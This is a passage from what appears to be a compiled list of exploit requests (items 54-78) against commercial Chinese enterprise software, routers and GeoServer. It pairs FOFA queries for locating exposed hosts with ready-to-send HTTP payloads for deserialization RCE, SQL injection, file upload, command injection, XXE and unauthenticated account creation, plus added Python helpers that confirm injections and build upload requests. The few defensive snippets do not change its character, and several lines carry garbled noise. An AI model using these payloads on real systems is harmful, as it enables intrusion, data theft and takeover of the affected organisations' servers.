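    return f"{secrets.token_hex(16)}.{ext.lower()}"


def resolve_download_path(base_dir: str, requested: str) -> Optional[Path]:
    """Map a client-supplied name onto base_dir; None means refuse the request.

    The name is percent-decoded twice so that ..%2F and a double-encoded
    %252e%252e both become literal dots before resolution, backslashes are
    normalised, and the resolved target must be a strict descendant of the
    resolved base. Checking the resolved path (not the string) is what makes
    the check independent of how the traversal was spelled.
    """
    decoded = urllib.parse.unquote(urllib.parse.unquote(requested))
    if not decoded.strip() or "\x00" in decoded:
        return None
    base = Path(base_dir).resolve()
    target = (base / decoded.replace("\\", "/").lstrip("/")).resolve()
    if base not in target.parents:
        return None
    return target


if __name__ == "__main__":
    for name in ("report.pdf", "./webapps/nc_web/1.jsp", r"\webapps\nc_web\x.jsp", "s.php", "%s.php "):
        print(f"upload   {name!r:32} -> {safe_upload_name(name)}")
    for req in ("reports/1.pdf", "../../../etc/passwd", "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"):
        print(f"download {req!r:50} -> {resolve_download_path('/srv/app/files', req)}")
```

The upload side deliberately ignores any client-supplied destination (the fname field in entry 24 would simply not be read), and the download side never serves the base directory itself.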
54. Chanjet T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below; the target executes a command that writes a marker string to a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using that cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

; Q0 ]$ p& l7 G0 ^6 U2 m, A56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE+ X! ?" g- q4 X& S' S
FOFA: app="畅捷通-TPlus"
) w9 n( O, O- L6 K% gPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
+ D( |2 _$ |* w* N' QHost: x.x.x.x' \; ?- p* Z2 q/ g" }( @! m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.367 b9 J: z K9 s7 G4 _' Z
Content-Type: application/json
$ O7 i& I1 p) Q# \4 v8 `! t! S7 @% D! o3 s3 f3 }
{
5 |3 U" d* r( R1 P p "storeID":{3 Z" t5 O6 e# U/ G0 t0 `. T, v
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",7 S. O7 x8 X1 t. z; R
"MethodName":"Start",. \6 c0 C+ B9 i* Q
"ObjectInstance":{
9 [, ?: h, d! M1 p; `4 o: N4 t "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 j4 s7 a" y& N3 l- c1 C [ "StartInfo": {
7 n4 U1 ]+ q+ L7 a( A1 q- C1 Y" A+ Z "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ x6 O7 ~: a2 E. r- g2 q
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
4 N: p6 w' d# \$ s. Q7 @ }/ B$ v& ^8 H7 x9 o1 R
}' [" y. D* Z- Y! |6 e1 | E, E
}
( k# `- I5 [. n9 M}, ^- u( s; d4 j0 x; a1 y
5 ?% u l1 V# }! j* w; N' F
! O* e$ j H0 w2 _0 p. e* W, {
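The fastjson request at the top of this section ("@type":"java.net.URL") and the two Chanjet T+ AjaxPro requests in 54 and 56 ("__type":"System.Windows.Data.ObjectDataProvider, ...") share one root cause: the deserializer lets the client name the class it will instantiate. The walker below is an added example written for this page, not code from Chanjet, AjaxPro or fastjson. It reports every type hint in a JSON body wherever it is nested, blocks the ones on a deny-list of known gadget types, and surfaces any other hint for review, since such a list is never complete. The deny-list and the sample bodies are constructed for this example (callback hosts replaced by attacker.example).

```python
"""Flag polymorphic type hints in JSON request bodies (added example)."""
import json
from typing import Iterator, List, Tuple

TYPE_HINT_KEYS = ("__type", "@type", "$type")   # AjaxPro/.NET, fastjson, Json.NET
GADGET_TYPES = (                                  # assumed deny-list; extend as needed
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
    "System.Diagnostics.ProcessStartInfo",
    "com.alibaba.fastjson.JSONObject",
    "java.net.URL",
    "java.net.Inet4Address",
    "com.sun.rowset.JdbcRowSetImpl",
)

Hint = Tuple[str, str, str]  # (json path, hint key, type name)


def type_hints(node, path: str = "$") -> Iterator[Hint]:
    """Walk the document and yield every type hint, including ones buried in arrays."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in TYPE_HINT_KEYS and isinstance(value, str):
                yield path, key, value
            yield from type_hints(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from type_hints(value, f"{path}[{i}]")


def is_gadget(type_name: str) -> bool:
    # .NET hints are assembly-qualified: keep only the type part before the first comma.
    return type_name.split(",", 1)[0].strip() in GADGET_TYPES


def classify_body(raw: str) -> Tuple[str, List[Hint]]:
    """Return ('block' | 'review' | 'allow', hints).

    Unparseable JSON is not waved through: fastjson and AjaxPro accept syntax
    that json.loads rejects (the `}""` tail in the fastjson POC), so a parse
    failure falls back to a textual scan of the raw body.
    """
    try:
        hints = list(type_hints(json.loads(raw)))
    except ValueError:
        found = [("?", "?", t) for t in GADGET_TYPES if f'"{t}"' in raw or f'"{t},' in raw]
        if found:
            return "block", found
        return ("review" if any(f'"{k}"' in raw for k in TYPE_HINT_KEYS) else "allow"), []
    if any(is_gadget(t) for _, _, t in hints):
        return "block", hints
    return ("review" if hints else "allow"), hints


# Constructed samples modelled on the POCs above (callback hosts replaced).
AJAXPRO_POC = json.dumps({"storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
        "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName": "cmd", "Arguments": "/c ping attacker.example"}}}})
FASTJSON_POC = '{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://attacker.example"}}""}'
BENIGN = '{"storeID": "1001"}'
UNKNOWN_HINT = '{"items": [{"@type": "com.example.Order", "id": 7}]}'

if __name__ == "__main__":
    for label, body in (("ajaxpro", AJAXPRO_POC), ("fastjson", FASTJSON_POC),
                        ("benign", BENIGN), ("unknown", UNKNOWN_HINT)):
        verdict, hints = classify_body(body)
        print(f"{label:9} {verdict:7} {[h[2] for h in hints]}")
```

The real fix is on the server side, where the deserializer should resolve only an explicit allowlist of expected types; the classifier above is the compensating control for traffic that reaches an unpatched instance.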
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64-encoded SQL that the export handler runs as-is; the value above decodes to select 1,user(),3.

61. 浙大恩特 (Entsoft) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

The raw request body is written to the file named by the filename parameter, so a .jsp name gives code execution.

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter of the bundled FlexPaper view.php reaches a shell command; the || runs the injected echo. Then request the written file:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based probe: a vulnerable instance answers about 5 seconds later than it does for a harmless sId.

65. 优卡特 脸爱云一脸通智慧管理平台 (Youkate face-recognition access management platform) 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456 / 123456 was created without any authentication. (visible_jh and visible_dorm carry the untouched form placeholder 请选择, "please select".)
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the hash computed by the UNION payload), the target is vulnerable.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId (together with the part's filename) names the written file, dir is the directory it is written to (relative, so ../ traversal escapes the intended folder) and fileType is the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then served at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js suffix makes the path look like a static resource to the authentication filter while the container still dispatches it to the JSP; a vulnerable instance delays its response by about 5 seconds.

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Same ;.js authentication bypass and 5-second time-based probe as item 68, this time through gd_startUserCode.

70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the command base64-encoded (the value above is type C:\Windows\win.ini); the __VIEWSTATE value carries the serialized payload that executes it.

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

A vulnerable instance delays its response by about 5 seconds.
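Items 64, 68, 69 and 71 all confirm the injection with WAITFOR DELAY '0:0:5', and a single slow response proves nothing on a loaded server. The following Python is an added example (not part of the original compilation) of how to confirm such a point: it interleaves zero-delay baseline probes with delayed probes and only reports the endpoint as injectable when the fastest delayed response is still clearly slower than the slowest baseline. It uses the URL shape of item 71; make_fake_server is a constructed stand-in for a real HTTP client so the code runs offline, and in practice send() would issue the request with http.client or requests.

```python
import re
import time
import urllib.parse


def delay_payload(seconds: float) -> str:
    """accId value in the shape used by item 71: 1';WAITFOR DELAY '0:0:<seconds>'--"""
    return urllib.parse.quote_plus(f"1';WAITFOR DELAY '0:0:{seconds:g}'--")


def login_probe_path(seconds: float) -> str:
    """Request target of item 71 with the chosen delay injected into accId."""
    return (f"/Global/Global_UserLogin.aspx?accId={delay_payload(seconds)}"
            "&loginCode&password&type")


def confirm_time_based(send, seconds: float = 5.0, trials: int = 3, ratio: float = 0.8) -> bool:
    """Decide whether the endpoint honours an injected WAITFOR DELAY.

    send(path) must perform the request and return once the response has
    arrived.  Baseline (delay 0) and delayed probes are interleaved so that
    drift in network latency affects both sets equally; the point is reported
    as injectable only if the fastest delayed response is still at least
    ratio*seconds slower than the slowest baseline response.
    """
    baseline, delayed = [], []
    for _ in range(trials):
        t0 = time.monotonic()
        send(login_probe_path(0))
        baseline.append(time.monotonic() - t0)
        t0 = time.monotonic()
        send(login_probe_path(seconds))
        delayed.append(time.monotonic() - t0)
    return min(delayed) - max(baseline) >= ratio * seconds


# --- constructed fake transport for offline use (assumption, not a real target) ---
_WAITFOR = re.compile(r"WAITFOR DELAY '0:0:([0-9.]+)'", re.IGNORECASE)


def make_fake_server(vulnerable: bool, base_latency: float = 0.0):
    """Return a send() that behaves like a vulnerable (or patched) MSSQL-backed page."""
    def send(path: str) -> None:
        time.sleep(base_latency)                       # constant network/app latency
        m = _WAITFOR.search(urllib.parse.unquote_plus(path))
        if vulnerable and m:                           # injected delay reaches the DB
            time.sleep(float(m.group(1)))
    return send


if __name__ == "__main__":
    print("vulnerable fake:", confirm_time_based(make_fake_server(True), seconds=0.2, trials=2))
    print("patched fake   :", confirm_time_based(make_fake_server(False, 0.05), seconds=0.2, trials=2))
```

Keep the delay well above the target's normal response jitter (5 seconds is the usual choice against an internet-facing host) and rerun with a different delay before reporting, since a proxy timeout or a slow backend can also produce a uniform delay.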

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

Decoded, xmlValue is a document with a DTD that declares the external entity xxe as file:///c:/windows/win.ini and expands it inside <d Index="VALUE">&xxe;</d>; the file content is reflected in the response.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 反序列化RCE- y0 K5 D( [- p
FOFA:title="M3-Server"
( K' e, b3 b# G7 W) DPAYLOAD7 Q/ D; z: w" A; _- X
75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The backticks in the time value are evaluated by the shell that applies the setting, and the redirected output lands in the CGI directory:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) 掌上校园 campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is rendered through FreeMarker, whose built-in Execute utility runs the command (the target here is Windows, hence cmd /c). Verify:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

The handler belongs to the bundled CuteSoft editor and accepts an .aspx extension; the file is stored under the folder given in the form.

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field chooses the directory under the web root. Verify:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x
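The multipart uploads in items 61, 67, 77 and 78 (and the later ones in this list) are easy to get wrong when replayed by hand: every part needs CRLF line endings, the closing boundary needs its trailing --, and Content-Length has to match the body byte for byte, otherwise the server reads a truncated or over-long body and the upload silently fails. The Python below is an added example (not code from the original compilation) that builds such a request from its parts and checks the declared length; pkpmbs_request reconstructs item 78 from its fields, and random_token is a helper for the throwaway marker that doubles as boundary material and echo string.

```python
import secrets
import string

CRLF = b"\r\n"


def random_token(n: int = 24) -> str:
    """Random alphanumeric marker, used both as boundary material and as the echo string."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def multipart_body(boundary: str, parts: list) -> bytes:
    """Encode parts as multipart/form-data.

    Each part is (name, filename_or_None, content_type_or_None, bytes).  A plain
    form field has filename=None and content_type=None, which matches the
    "target", "folder" and "MAX_FILE_SIZE" fields in the requests above.
    """
    out = bytearray()
    for name, filename, ctype, data in parts:
        out += b"--" + boundary.encode() + CRLF
        disposition = f'Content-Disposition: form-data; name="{name}"'
        if filename is not None:
            disposition += f'; filename="{filename}"'
        out += disposition.encode() + CRLF
        if ctype is not None:
            out += f"Content-Type: {ctype}".encode() + CRLF
        out += CRLF + data + CRLF                      # blank line, payload, line end
    out += b"--" + boundary.encode() + b"--" + CRLF    # closing boundary
    return bytes(out)


def build_upload_request(host: str, path: str, boundary: str, parts: list) -> bytes:
    """Full HTTP/1.1 request bytes with a Content-Length computed from the real body."""
    body = multipart_body(boundary, parts)
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body


def pkpmbs_request(host: str, marker: str) -> bytes:
    """Item 78 rebuilt from its parameters: the file part first, then the target directory."""
    boundary = "----" + marker
    parts = [
        ("file", marker + ".txt", "image/png", marker.encode()),
        ("target", None, None, b"/Applications/SkillDevelopAndEHS/"),
    ]
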